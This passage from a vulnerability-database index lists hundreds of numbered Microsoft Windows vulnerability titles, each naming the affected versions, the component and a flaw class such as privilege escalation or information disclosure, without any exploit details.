corruption [106489] Microsoft Windows up to Server 2016 Graphics Win32k win32k!fsc_CalcGrayRow information disclosure [106472] Microsoft Windows up to Server 2016 Bluetooth Driver Object BlueBorne privilege escalation [106454] Microsoft Windows up to Server 2016 Windows NetBT Session Services race condition [105051] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Font Library Data Processing Error [105049] Microsoft Windows 10 1703 Remote Desktop Protocol Data Processing Error [105017] Microsoft Windows up to Server 2016 Error Reporting privilege escalation [105013] Microsoft Windows 10 1607/10 1703/Server 2016 Hyper-V privilege escalation [105011] Microsoft Windows up to Server 2016 Windows Search memory corruption [105010] Microsoft Windows up to Server 2016 Win32k privilege escalation [105009] Microsoft Windows up to Server 2016 Input Method Editor Data Processing Error [104990] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [104989] Microsoft Windows up to Server 2016 NetBIOS Data Processing Error [104982] Microsoft Windows up to XP SMBv1 Smbloris denial of service [103446] Microsoft Windows up to Server 2016 Search privilege escalation [103445] Microsoft Windows up to Server 2016 Wordpad privilege escalation [103444] Microsoft Windows up to Server 2016 Explorer privilege escalation [103442] Microsoft Windows 10/Server 2016 HoloLens privilege escalation [103441] Microsoft Windows up to Server 2016 Object HTTP.sys information disclosure [103431] Microsoft Windows up to Server 2016 PowerShell privilege escalation [103429] Microsoft Windows up to Server 2016 Kerberos privilege escalation [103420] Microsoft Windows up to Server 2016 Kerberos weak authentication [103417] Microsoft Windows up to Server 2016 Windows Shell 7PK Security Features [102513] Microsoft Windows Server 2003 SP2/XP SP3 OLE olecnv32.dll privilege escalation [102511] Microsoft Windows Server 2003 SP2/XP SP3 RDP EsteemAudit privilege escalation [102412] Microsoft Windows up to Server 2016 PDF privilege escalation [102401] Microsoft Windows 7 SP1/Server 2008 R2 SP1 GDI USP10!NextCharInLiga information disclosure [102387] Microsoft Windows up to XP SP3 Search privilege escalation [102386] Microsoft Windows up to Server 2012 R2 Uniscribe memory corruption [102385] Microsoft Windows up to Server 2016 Font Library memory corruption [102377] Microsoft Windows up to Vista SP2 lnk File privilege escalation [102376] Microsoft Windows up to Server 2016 CAB File Data Processing Error [102375] Microsoft Windows up to Server 2016 PDF Parser privilege escalation [102374] Microsoft Windows up to Server 2016 PDF Parser privilege escalation [102373] Microsoft Windows up to Server 2016 Uniscribe Font USP10!MergeLigRecords privilege escalation [101820] Microsoft Windows Vista/7/8.1 NtfsCommonCreate denial of service [101817] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101816] Microsoft Windows up to Server 2016 Malware Protection Engine setCaller memory corruption [101815] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [101814] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101813] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [101812] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101811] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101810] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101491] Microsoft Windows up to XP SP3/Server 2003 SP2 Remote Desktop Protocol gpkcsp.dll memory corruption [101043] Microsoft Windows up to XP SP3 SMB privilege escalation [101042] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101041] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101040] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101039] Microsoft Windows up to XP SP3 SMB privilege escalation [101038] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101037] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101036] Microsoft Windows up to XP SP3 SMBv1 Server privilege escalation [101035] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101034] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101028] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [101026] Microsoft Windows DNS Server privilege escalation [101011] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 ActiveX Object Memory information disclosure [101002] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [101001] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [101000] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [100999] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [100918] Microsoft Windows 8/8.1/10/Server 2012/Server 2016 Malware Protection Service memory corruption [100854] Microsoft Windows Server 2003 SP2 RRAS ERRATICGOPHER memory corruption [99904] Microsoft Windows Server 2003 SP2/XP SP3 SmartCard Authentication EsteemAudit privilege escalation [99696] Microsoft Windows up to Vista SP2 Adobe Type Manager Font Driver ATMFD.dll information disclosure [99685] Microsoft Windows up to Vista SP2 LDAP privilege escalation [99683] Microsoft Windows 10 1607/10 1703/Server 2012 R2/Server 2016 Active Directory 7PK Security Features [99681] Microsoft Windows up to Server 2016 OLE Integrity-Level Check privilege escalation [99680] Microsoft Windows up to Vista SP2 Win32k privilege escalation [99667] Microsoft Windows 10/Server 2016 Active Directory Service Unresponsive privilege escalation [98561] Microsoft IIS 6.0 on Windows Server 2003 WebDAV ScStoragePathFromUrl Immortal/ExploidingCan memory corruption [98272] Microsoft Windows up to 10/Server 2016 Local Session privilege escalation [98113] Microsoft Windows up to Vista SP2 XML Core Services information disclosure [98112] Microsoft Windows up to Vista SP2 DirectShow information disclosure [98111] Microsoft Windows 7 SP1/Vista SP2 DVD Maker cross site request forgery [98110] Microsoft Windows Active Directory Federation Services information disclosure [98069] Microsoft Windows up to Server 2012 R2 Color Management privilege escalation [98068] Microsoft Windows up to Vista SP2 Graphics Component USP10!otlList::insertAt memory corruption [98067] Microsoft Windows up to Vista SP2 Color Management information disclosure [98066] Microsoft Windows Color Management information disclosure [98065] Microsoft Windows up to Vista SP2 GDI+ information disclosure [98058] Microsoft Windows iSNS Server memory corruption [98056] Microsoft Windows up to Server 2016 DNS Query information disclosure [98055] Microsoft Windows up to Vista SP2 DLL Loader privilege escalation [98054] Microsoft Windows up to Server 2016 SMBv2/SMBv3 denial of service [98052] Microsoft Windows up to Vista SP2 Uniscribe information disclosure [98051] Microsoft Windows up to Vista SP2 Uniscribe information disclosure [98050] Microsoft Windows up to Vista SP2 Uniscribe Read/Write memory corruption [98049] Microsoft Windows Uniscribe information disclosure [98048] Microsoft Windows Uniscribe information disclosure [98047] Microsoft Windows Uniscribe information disclosure [98046] Microsoft Windows Uniscribe information disclosure [98045] Microsoft Windows Uniscribe information disclosure [98044] Microsoft Windows Uniscribe information disclosure [98043] Microsoft Windows Uniscribe information disclosure [98042] Microsoft Windows Uniscribe information disclosure [98041] Microsoft Windows Uniscribe information disclosure [98040] Microsoft Windows Uniscribe information disclosure [98039] Microsoft Windows Uniscribe information disclosure [98038] Microsoft Windows Uniscribe information disclosure [98037] Microsoft Windows Uniscribe information disclosure [98036] Microsoft Windows Uniscribe information disclosure [98035] Microsoft Windows Uniscribe information disclosure [98034] Microsoft Windows Uniscribe information disclosure [98033] Microsoft Windows Uniscribe information disclosure [98032] Microsoft Windows Uniscribe information disclosure [98031] Microsoft Windows Uniscribe rule information disclosure [98030] Microsoft Windows Uniscribe memory corruption [98029] Microsoft Windows Uniscribe memory corruption [98028] Microsoft Windows Uniscribe memory corruption [98027] Microsoft Windows Uniscribe memory corruption [98026] Microsoft Windows Uniscribe memory corruption [98025] Microsoft Windows Uniscribe memory corruption [98024] Microsoft Windows Uniscribe Data Processing Error [98023] Microsoft Windows up to Vista SP2 SMB privilege escalation [98022] Microsoft Windows up to XP SP3 SMB information disclosure [98021] Microsoft Windows up to XP SP3 SMB privilege escalation [98020] Microsoft Windows up to XP SP3 SMB privilege escalation [98019] Microsoft Windows up to XP SP3 SMB privilege escalation [98018] Microsoft Windows up to XP SP3 SMB privilege escalation [98017] Microsoft Windows up to Server 2016 PDF memory corruption [98016] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98015] Microsoft Windows 10/Server 2016 Hyper-V privilege escalation [98014] Microsoft Windows up to Vista SP2 Hyper-V information disclosure [98013] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [98012] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98011] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98010] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98009] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98007] Microsoft Windows 10/Server 2016 Hyper-V Network Switch privilege escalation [98006] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [96521] Microsoft Windows 8.1/10/Server 2012/Server 2016 SMB Response mrxsmb20.sys denial of service [95126] Microsoft Windows Local Security Authority Subsystem Service privilege escalation [94457] Microsoft Windows up to Vista SP2 Win32k privilege escalation [94456] Microsoft Windows up to Vista SP2 PFB Font win32k.sys Data Processing Error [94437] Microsoft Windows up to Vista SP2 Uniscribe LoadUvsTable Data Processing Error [94436] Microsoft Windows 10 Graphics Data Processing Error [94435] Microsoft Windows up to Vista SP2 Graphics Data Processing Error [94434] Microsoft Windows GDI information disclosure [93964] Microsoft Windows 7 Excel Starter 2010 XML External Entity [93963] Microsoft Windows Authorization Manager msxml3.dll File information disclosure [93962] Microsoft Windows 7 SP1 Event Viewer File information disclosure [93954] Microsoft Windows 7 SP1 NFO File MSINFO32.EXE XML External Entity [93953] Microsoft Windows Media Center 6.1.7600 MCL File ehshell.exe XML External Entity [93602] Microsoft Windows 7/10 cmd.exe privilege escalation [93419] Microsoft Windows up to Vista SP2 NTLM Password Change privilege escalation [93418] Microsoft Windows up to Vista SP2 Local Security Authority Subsystem Service privilege escalation [93390] Microsoft Windows up to Vista SP2 Open Type Font privilege escalation [93389] Microsoft Windows up to Server 2016 Media Foundation memory corruption [93388] Microsoft Windows up to Server 2016 Animation Manager Stylesheets memory corruption [93387] Microsoft Windows up to Vista SP2 Open Type Font information disclosure [93386] Microsoft Windows Vista SP2/7 SP1/8.1/RT 8.1/10 Video Control privilege escalation [93383] Microsoft Windows up to Vista SP2 Image File Upload privilege escalation [92596] Microsoft Windows 7 SP1/Server 2008 R2/Server 2008 SP2/Vista SP2 Internet Messaging API File information disclosure [92595] Microsoft Windows 10 Diagnostics Hub privilege escalation [92590] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92589] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92588] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92587] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 Transaction Manager privilege escalation [92586] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92585] Microsoft Windows Vista SP2/7 SP1/8.1/RT 8.1/10 Video Control memory corruption [92583] Microsoft Windows up to Vista SP2 True Type Font privilege escalation [92582] Microsoft Windows up to Vista SP2 GDI+ privilege escalation [92581] Microsoft Windows up to Vista SP2 Graphics privilege escalation [92580] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92579] Microsoft Windows up to Vista SP2 GDI+ information disclosure [92578] Microsoft Windows up to Vista SP2 GDI+ information disclosure [92577] Microsoft Windows up to Vista SP2 True Type Font information disclosure [91572] Microsoft Windows up to Vista Scripting Engine memory corruption [91571] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library information disclosure [91570] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library information disclosure [91569] Microsoft Windows up to Vista privilege escalation [91561] Microsoft Windows up to Vista Object memory corruption [91560] Microsoft Windows 10 Object memory corruption [91559] Microsoft Windows 8.1/10/RT 8.1 NTLM SSO privilege escalation [91540] Microsoft Windows up to Vista GDI memory corruption [91539] Microsoft Windows up to Vista GDI privilege escalation [91538] Microsoft Windows up to Vista GDI 7PK Security Features [91537] Microsoft Windows win32k.sys privilege escalation [91536] Microsoft Windows up to Vista win32k.sys privilege escalation [90934] Microsoft Windows 7/8.1 FON Font File win32k.sys denial of service [90713] Microsoft Windows up to Vista SP2 NetBIOS privilege escalation [90712] Microsoft Windows 10/10 1511 Universal Outlook information disclosure [90711] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF privilege escalation [90710] Microsoft Windows 8.1/RT 8.1/Server 2012/Server 2012 R2 Netlogon privilege escalation [90709] Microsoft Windows up to Vista SP2 Kerberos privilege escalation [90702] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90701] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90700] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90699] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90698] Microsoft Windows Graphics privilege escalation [90697] Microsoft Windows Graphics privilege escalation [90696] Microsoft Windows up to Vista SP2 Graphics privilege escalation [90252] Microsoft Windows TCP/IP NetBios Helper Service information disclosure [89605] Microsoft Windows NT 4.0/2000 Security Event Log denial of service [89604] Microsoft Windows NT 4.0/2000 Application Event Log denial of service [89571] Microsoft Windows IMAPI CD Burning COM privilege escalation [89570] Microsoft Windows Netmeeting Remote Desktop Sharing privilege escalation [89520] Microsoft Windows Terminal Services information disclosure [89505] Microsoft Windows FTP Server privilege escalation [89504] Microsoft Windows System Event Log privilege escalation [89444] Microsoft Windows Remote Desktop/Terminal Services Web Connection weak authentication [89431] Microsoft Windows FAT32 Partition Driver information disclosure [89417] Microsoft Windows RAS Connection weak encryption [89413] Microsoft Windows Default Share privilege escalation [89411] Microsoft Windows LanMan Hash weak authentication [89389] Microsoft Windows Auto Update information disclosure [89345] Microsoft Windows NetBIOS Shared Folder information disclosure [89344] Microsoft Windows NetBIOS/SMB Authentication information disclosure [89342] Microsoft Windows 95/98 LanMan Hash weak encryption [89340] Microsoft Windows 95/98 SMB Service memory corruption [89337] Microsoft Windows FTP Service denial of service [89335] Microsoft Windows NetBIOS/CIFS weak encryption [89303] Microsoft Windows Admin Account weak authentication [89299] Microsoft Windows LanMan Authentication weak authentication [89297] Microsoft Windows Startup Malware privilege escalation [89295] Microsoft Windows Services information disclosure [89294] Microsoft Windows Guest Account information disclosure [89293] Microsoft Windows Guest Account unknown vulnerability [89292] Microsoft Windows Guest Account Log information disclosure [89290] Microsoft Windows Security Log denial of service [89288] Microsoft Windows Winlogon privilege escalation [89259] Microsoft Windows Patch MS04-002 privilege escalation [89150] Microsoft Windows RAS weak encryption [89051] Microsoft Windows up to Vista SP2 .NET Framework information disclosure [89036] Microsoft Windows up to Vista SP2 Print Spooler ntprint.dll PSetupDownloadAndInstallLegacyDriver privilege escalation [89035] Microsoft Windows up to Vista SP2 Print Spooler ntprint.dll PSetupDownloadAndInstallLegacyDriver 7PK Security Features [89034] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [88883] Microsoft Windows VeriSign weak authentication [88787] Microsoft Windows NT 4.0 RAS via PPP denial of service [88786] Microsoft Windows NT 4.0 NetBIOS Over TCP privilege escalation [88781] Microsoft Windows 2000 Active Directory Schema privilege escalation [88775] Microsoft Windows XP Digitally Sign weak authentication [88774] Microsoft Windows XP Digitally Sign weak authentication [88773] Microsoft Windows XP Digitally Sign weak authentication [88772] Microsoft Windows XP Session Key weak authentication [88765] Microsoft Windows 2000/2000 SP1/2000 SP2 Service Pack 3 privilege escalation [88763] Microsoft Windows Remote Data Services information disclosure [88706] Microsoft Windows up to NT 3.51 SP4/4.0 SP5 RRAS denial of service [88686] Microsoft Windows Locator Service information disclosure [88675] Microsoft Windows information disclosure [88670] Microsoft Windows Password Filter privilege escalation [88664] Microsoft Windows NT 4.0 TCP/IP Security privilege escalation [88658] Microsoft Windows NT 4.0 Device Driver privilege escalation [88657] Microsoft Windows NT 4.0/2000 DHCP Server information disclosure [88655] Microsoft Windows 2000 DNS Server privilege escalation [88649] Microsoft Windows information disclosure [88644] Microsoft Windows 2000 Active Directory Kerberos Ticket Logging privilege escalation [88630] Microsoft Windows Registry Permission privilege escalation [88598] Microsoft Windows NT 4.0/2000 privilege escalation [88438] Microsoft Windows 95/98 ICMP denial of service [88319] Microsoft Windows NT 4.0 File Protection privilege escalation [88316] Microsoft Windows privilege escalation [88313] Microsoft Windows W32/Deloder Worm privilege escalation [88311] Microsoft Windows UPnP TCP Helper information disclosure [88285] Microsoft Windows CIS information disclosure [88283] Microsoft Windows Terminal Services/Citrix Server weak authentication [88281] Microsoft Windows SvcOpenSCManager information disclosure [88276] Microsoft Windows shlwapi.dll denial of service [88269] Microsoft Windows Registry Password information disclosure [88268] Microsoft Windows information disclosure [88266] Microsoft Windows information disclosure [88265] Microsoft Windows information disclosure [88264] Microsoft Windows User information disclosure [88253] Microsoft Windows SMB Server privilege escalation [88251] Microsoft Windows Guest Account privilege escalation [88240] Microsoft Windows NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 SNMP GET unknown vulnerability [88236] Microsoft Windows NT 4.0/2000/Server 2003/XP SNMP WINS privilege escalation [88210] Microsoft Windows Secure Site weak encryption [88199] Microsoft Windows NT 4.0 Ssping teardrop2 Patch denial of service [88198] Microsoft Windows DNS Server privilege escalation [88196] Microsoft Windows Force Shutdown from a Remote System Privilege privilege escalation [88195] Microsoft Windows Modify Firmware Environment Values Privilege privilege escalation [88194] Microsoft Windows Debug Programs Privilege privilege escalation [88193] Microsoft Windows Restore Files/Directories Privilege privilege escalation [88192] Microsoft Windows Backup Files/Directories Privilege privilege escalation [88191] Microsoft Windows Create a Pagefile Privilege privilege escalation [88190] Microsoft Windows Increase Scheduling Priority Privilege privilege escalation [88188] Microsoft Windows Profile Single Process Privilege privilege escalation [88187] Microsoft Windows Change the System Time Privilege privilege escalation [88186] Microsoft Windows Create Permanent Shared Objects Privilege privilege escalation [88185] Microsoft Windows Profile System Performance Privilege privilege escalation [88184] Microsoft Windows Act as Part of the Operating System Privilege privilege escalation [88183] Microsoft Windows Increase Quotas Privilege privilege escalation [88182] Microsoft Windows Load/Unload Device Drivers Privilege privilege escalation [88181] Microsoft Windows Lock Pages in Memory Privilege privilege escalation [88179] Microsoft Windows Protocol information disclosure [88178] Microsoft Windows Network Interface information disclosure [88173] Microsoft Windows rsh TCP Sequence privilege escalation [88172] Microsoft Windows Service Unknown information disclosure [88171] Microsoft Windows Registry File Association privilege escalation [88159] Microsoft Windows Remote Access Service information disclosure [88157] Microsoft Windows 2000/NT Password Policy weak authentication [88155] Microsoft Windows 2000/NT/XP LAN Manager weak encryption [88154] Microsoft Windows 2000/NT Username information disclosure [88153] Microsoft Windows 2000/NT information disclosure [88152] Microsoft Windows NetBIOS privilege escalation [88151] Microsoft Windows Registry privilege escalation [88150] Microsoft Windows NT Share information disclosure [87961] Microsoft Windows up to Server 2012 R2 Search privilege escalation [87960] Microsoft Windows Server 2008 R2/Server 2012/Server 2012 R2 Active Directory privilege escalation [87959] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF information disclosure [87958] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF privilege escalation [87957] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF information disclosure [87952] Microsoft Windows 10/10 1511 Diagnostic Hub Data Processing Error [87951] Microsoft Windows up to Vista SP2 WPAD Data Processing Error [87950] Microsoft Windows up to Vista SP2 WPAD privilege escalation [87949] Microsoft Windows Netlogon privilege escalation [87948] Microsoft Windows up to Vista SP2 SMB Server privilege escalation [87947] Microsoft Windows up to Vista SP2 Adobe Type Manager Font Driver atmfd.dll privilege escalation [87946] Microsoft Windows 10 Kernel win32k.sys privilege escalation [87945] Microsoft Windows up to Vista SP2 Graphics Component information disclosure [87944] Microsoft Windows Server 2012/Server 2012 R2 Virtual PCI Memory information disclosure [87943] Microsoft Windows up to Vista SP2 Kernel win32k.sys privilege escalation [87942] Microsoft Windows up to Vista SP2 Kernel win32k.sys privilege escalation [87941] Microsoft Windows up to Vista SP2 Group Policy privilege escalation [87940] Microsoft Windows Server 2012/Server 2012 R2 DNS Server memory corruption [87935] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87934] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87933] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87167] Microsoft Windows up to Vista SP2 DirectX Graphics Kernel Subsystem privilege escalation [87166] Microsoft Windows up to Server 2012 R2 DirectX Graphics Kernel Subsystem privilege escalation [87165] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87164] Microsoft Windows up to Vista SP2 win32k.sys information disclosure [87163] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87162] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87161] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87158] Microsoft Windows Vista SP2/7 SP1/8.1 Media Center privilege escalation [87156] Microsoft Windows 8.1/10/RT 8.1/Server 2012 R2 Shell privilege escalation [87155] Microsoft Windows Vista SP2/7/8.1/RT 8.1/10 Journal privilege escalation [87154] Microsoft Windows up to Vista SP2 Imaging memory corruption [87153] Microsoft Windows up to Vista SP2 Direct3D memory corruption [87152] Microsoft Windows up to Vista SP2 Graphics Component privilege escalation [87151] Microsoft Windows up to Vista SP2 Graphics Component information disclosure [87150] Microsoft Windows up to Vista SP2 Graphics Component information disclosure [87145] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [87144] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [83151] Microsoft Windows EMF File GetEnhMetaFilePaletteEntries denial of service [82236] Microsoft Windows up to Vista SP2 OLE privilege escalation [82234] Microsoft Windows 10 HTTP.sys Data Processing Error [82231] Microsoft Windows up to Vista SP2 Font Library memory corruption [82226] Microsoft Windows up to Vista SP2 SAM/LSAD Badlock 7PK Security Features [82223] Microsoft Windows 8.1/10/Server 2012 R2 Hyper-V Memory information disclosure [82222] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Memory information disclosure [82221] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Hyper-V privilege escalation [81899] Microsoft Windows Media Services privilege escalation [81837] Microsoft Windows NT 4.0 SynAttackProtect denial of service [81815] Microsoft Windows NT 3.51/NT 4.0 Registry privilege escalation [81814] Microsoft Windows Telnet weak encryption [81813] Microsoft Windows XP weak encryption [81812] Microsoft Windows XP Network Client Feature weak authentication [81801] Microsoft Windows Logon Hours privilege escalation [81798] Microsoft Windows XP Remote Desktop information disclosure [81788] Microsoft Windows privilege escalation [81719] Microsoft Windows privilege escalation [81718] Microsoft Windows 4.0/4.0 SP1/4.0 SP2/4.0 SP3 Service Pack Patches privilege escalation [81685] Microsoft Windows Guest Account privilege escalation [81284] Microsoft Windows up to Vista SP2 .NET Framework privilege escalation [81283] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81282] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81281] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81280] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81279] Microsoft Windows up to Vista SP2 USB Mass Storage Class Driver privilege escalation [81277] Microsoft Windows privilege escalation [81276] Microsoft Windows up to Vista SP2 OLE privilege escalation [81275] Microsoft Windows up to Vista SP2 OLE privilege escalation [81271] Microsoft Windows 10 PDF Library privilege escalation [81270] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library privilege escalation [81269] Microsoft Windows up to Server 2012 R2 Media Parser privilege escalation [81268] Microsoft Windows up to Server 2012 R2 Media Parser privilege escalation [81267] Microsoft Windows up to Vista SP2 OpenType Font privilege escalation [81266] Microsoft Windows up to Vista SP2 OpenType Font privilege escalation [81265] Microsoft Windows Server 2008/Vista SP2 Library Loader privilege escalation [80885] Microsoft Windows 7 SP1/8.1/10/Server 2012/Server 2012 R2 RDP privilege escalation [80879] Microsoft Windows Network Policy Server RADIUS privilege escalation [80878] Microsoft Windows Server 2012 R2 Active Directory Federation Service privilege escalation [80877] Microsoft Windows up to Vista SP2 Forms information disclosure [80876] Microsoft Windows up to Vista SP2 .NET Framework privilege escalation [80874] Microsoft Windows 7 SP1/8.1/10/Server 2012/Server 2012 R2 RDP privilege escalation [80866] Microsoft Windows up to Vista SP2 DLL Loader privilege escalation [80865] Microsoft Windows 8.1/RT 8.1/Server 2012/Server 2012 R2 DLL Loader privilege escalation [80864] Microsoft Windows up to Vista DLL Loader privilege escalation [80863] Microsoft Windows up to Vista DLL Loader privilege escalation [80861] Microsoft Windows up to Vista SP2 Journal memory corruption [80860] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Reader privilege escalation [80859] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF Library memory corruption [80223] Microsoft Windows 10/1511 RDP Service 7PK Security Features [80220] Microsoft Windows up to Vista SP2 DirectShow memory corruption [80215] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [80214] Microsoft Windows up to Vista SP2 Graphics Device Interface GDI32.dll information disclosure [80213] Microsoft Windows up to Vista SP2 Sandbox privilege escalation [80212] Microsoft Windows up to Vista SP2 Sandbox privilege escalation [79515] Microsoft Windows 10 Kernel privilege escalation [79514] Microsoft Windows up to Vista Kernel privilege escalation [79513] Microsoft Windows up to Vista Kernel privilege escalation [79512] Microsoft Windows up to Vista Kernel privilege escalation [79511] Microsoft Windows Vista/7/8/8.1 Media Center privilege escalation [79510] Microsoft Windows Vista/7/8/8.1 Media Center information disclosure [79509] Microsoft Windows up to Vista PGM race condition [79508] Microsoft Windows up to Server 2012 R2 Library Loader privilege escalation [79507] Microsoft Windows up to Vista Library Loader privilege escalation [79506] Microsoft Windows 7/Server 2008/Server 2008 R2/Vista Library Loader privilege escalation [79499] Microsoft Windows 7/Server 2008 R2 Uniscribe Numeric Error [79495] Microsoft Windows up to Vista Graphics memory corruption [79494] Microsoft Windows up to Vista Graphics memory corruption [79493] Microsoft Windows Server 2008/Vista Graphics memory corruption [79492] Microsoft Windows DNS memory corruption [79191] Microsoft Windows Journal memory corruption [79184] Microsoft Windows up to Vista TLS Schannel privilege escalation [79183] Microsoft Windows up to Server 2012 R2 IPsec denial of service [79182] Microsoft Windows up to Vista Winsock privilege escalation [79174] Microsoft Windows up to Vista Kernel 7PK Security Features [79173] Microsoft Windows up to Server 2012 R2 Graphics information disclosure [79172] Microsoft Windows up to Vista Graphics privilege escalation [79171] Microsoft Windows up to Vista Graphics privilege escalation [79170] Microsoft Windows up to Vista Kernel information disclosure [79169] Microsoft Windows up to Vista Kernel privilege escalation [79168] Microsoft Windows up to Vista Kernel 7PK Security Features [79167] Microsoft Windows 7/Server 2008/Server 2008 R2/Vista Journal memory corruption [78364] Microsoft Windows 7 SP1/Vista SP2 Shell memory corruption [78363] Microsoft Windows up to Vista SP2 Shell memory corruption [77640] Microsoft Windows Active Directory Code [77636] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77625] Microsoft Windows up to Vista SP2 Journal File Numeric Error [77622] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77621] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77620] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77616] Microsoft Windows Vista SP2/7 SP1/8/8.1 Windows Media Center privilege escalation [77613] Microsoft Windows up to Vista SP2 Adobe Type Manager Library atmfd.dll privilege escalation [77042] Microsoft Windows up to Vista Filesystem privilege escalation [77041] Microsoft Windows up to Vista Registry privilege escalation [77040] Microsoft Windows up to Vista Object Manager privilege escalation [77039] Microsoft Windows up to Vista WebDAV SSL weak encryption [77038] Microsoft Windows Server 2008 SP2 UDDI Services cross site scripting [77037] Microsoft Windows Server 2012/Server 2012 R2 System Center Operations Manager cross site scripting [77035] Microsoft Windows up to Vista Server Message Block memory corruption [77034] Microsoft Windows up to Vista Remote Desktop Session Host privilege escalation [77033] Microsoft Windows up to Vista Remote Desktop Session Host privilege escalation [77032] Microsoft Windows up to Vista XML Core Services weak encryption [77031] Microsoft Windows up to Vista XML Core Services information disclosure [77030] Microsoft Windows up to Vista XML Core Services weak encryption [77029] Microsoft Windows up to Vista Shell Security Feature privilege escalation [77028] Microsoft Windows up to Vista KMD Security Feature privilege escalation [77027] Microsoft Windows up to Vista CSRSS privilege escalation [77026] Microsoft Windows up to Vista ASLR information disclosure [77025] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77024] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77023] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77022] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77021] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77020] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77019] Microsoft Windows up to Vista OpenType Font Parser Code [77018] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77017] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77016] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77015] Microsoft Windows up to Vista OpenType Font Parser Data Processing Error [76756] Microsoft Windows up to Vista SP2 Adobe Type Manager Library atmfd.dll memory corruption [76493] Microsoft Windows up to Vista SP2 OLE privilege escalation [76492] Microsoft Windows up to Vista SP2 OLE privilege escalation [76461] Microsoft Windows up to Server 2012 R2 Domain-Controller Communication Credentials information disclosure [76460] Microsoft Windows 7 SP1/8/Server 2012 RDP Server Service Data Processing Error [76449] Microsoft Windows 8/8.1/Server 2008/Server 2012/Server 2012 R2 Hyper-V 7PK Security Features [76448] Microsoft Windows 8.1/Server 2012 R2 Hyper-V memory corruption [75783] Microsoft Windows Server 2008/Server 2012 Active Directory Federation Services cross site scripting [75782] Microsoft Windows up to Vista Common Controls memory corruption [75760] Microsoft Windows Media Player 